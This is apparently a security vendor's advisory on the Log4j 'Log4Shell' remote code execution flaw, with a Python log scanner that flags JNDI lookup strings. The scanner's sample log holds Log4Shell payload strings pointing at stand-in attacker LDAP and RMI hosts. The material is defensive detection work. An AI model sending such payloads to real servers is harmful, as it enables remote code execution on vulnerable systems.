Updated 12/29
A zero-day vulnerability involving the Log4j 2 utility was publicly disclosed on December 9, 2021, via the Apache GitHub. Log4j 2 is an open-source Java logging library integrated in many enterprise applications, as well as open-source software and other services. Its widespread use and the number of configuration variables make this a high-impact threat.
ReliaQuest has been tracking the vulnerability since it was first disclosed. This blog will provide ongoing status updates and recommendations for mitigating the impact of Log4j in customer environments. Additional details on the Log4Shell vulnerability and tools to respond are available in Log4Shell and ReliaQuest Solutions.
The information below is accurate as of Wednesday, December 29.
Latest Updates
Affected Versions
Patched Versions
Standing Customer Recommendations
ReliaQuest Detections
ReliaQuest is deploying the following detection capabilities:
ReliaQuest GreyMatter Hunt
ReliaQuest is actively hunting in both SIEM and EDR customer environments for activity related to this campaign, with a focus on successful exploitation using host-based telemetry.
ReliaQuest SIEM and EDR Patching
Description
A remote code execution vulnerability was discovered in Apache Log4j and is being actively exploited. When crafted parameters are passed to a system running a vulnerable version of this library and the library logs them, the embedded lookup string is evaluated and executed. Current exploitation of this vulnerability leverages LDAP calls to malicious servers that redirect to malicious Java class files for execution. Other methods of exploitation exist as well and are still being discovered. As of this writing, a typical observance of this attack contains the following in a web request log: “${jndi:[PROTOCOL]://[MALICIOUS SERVER]/}”. Indicators of Compromise (IOCs) are added to the ReliaQuest Emergency Feed as they are identified. ReliaQuest has already identified IP addresses conducting scanning activities and has added them to our detection feeds.
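A minimal detection for the web-request pattern described above, added here as an example and not ReliaQuest's own detection content: it URL-decodes the request, referrer and User-Agent fields of constructed combined-format access log lines and flags the JNDI lookup string, reporting the protocol and the server it points at. The log format, the protocol list and all IPs and hostnames are assumptions.

```python
import re
from urllib.parse import unquote

# Lookup string from the advisory: ${jndi:<protocol>://<server>/...}
# Matched case-insensitively after URL-decoding, since the string is often
# encoded in transit. The protocol list is an assumption (common JNDI schemes).
JNDI_RE = re.compile(
    r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://([^/\s}]+)", re.I
)

# Combined log format with a trailing User-Agent field (assumed layout).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def scan_line(line):
    """Return (source_ip, field, protocol, server) if the line carries a
    JNDI lookup string in any of the attacker-controlled fields, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for field in ("req", "ref", "ua"):
        # Decode twice to also catch double-encoded payloads.
        decoded = unquote(unquote(m.group(field)))
        hit = JNDI_RE.search(decoded)
        if hit:
            return (m.group("src"), field, hit.group(1).lower(), hit.group(2))
    return None


def scan_log(lines):
    """Run scan_line over every line and keep only the hits."""
    return [hit for hit in (scan_line(line) for line in lines) if hit]


# Constructed sample log (placeholder IPs and hostnames, not real IOCs).
SAMPLE_LOG = [
    '198.51.100.10 - - [10/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.50 - - [10/Dec/2021:03:15:22 +0000] "GET /?x=${jndi:ldap://203.0.113.7:1389/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.51 - - [10/Dec/2021:03:16:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:rmi://attacker.example.net/x}"',
    '198.51.100.20 - - [10/Dec/2021:03:17:45 +0000] "GET /login?user=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.9%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for src, field, proto, server in scan_log(SAMPLE_LOG):
        print(f"{src} -> JNDI lookup in {field}: {proto}://{server}")
```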
Vulnerability Discovery
NOTE: Some tools can leak information about your environment. ReliaQuest recommends evaluating the impact to your organization before using them.
Helpful Resources
Severity Criteria
✓ This technique can propagate without user interaction
✓ This technique can cause serious impacts
✓ This technique affects nearly all Java platforms
✓ This technique is a major security event
Advisory History
ReliaQuest has the following detection capabilities available:
Building Block: 002650 – Log4j User Agent RCE
Hunt: 002651 – log4j RCE (CVE-2021-44228)
Rule: 002652 – Log4j Scanning and Response Traffic
ReliaQuest has the following IOCs available within GreyMatter Intel: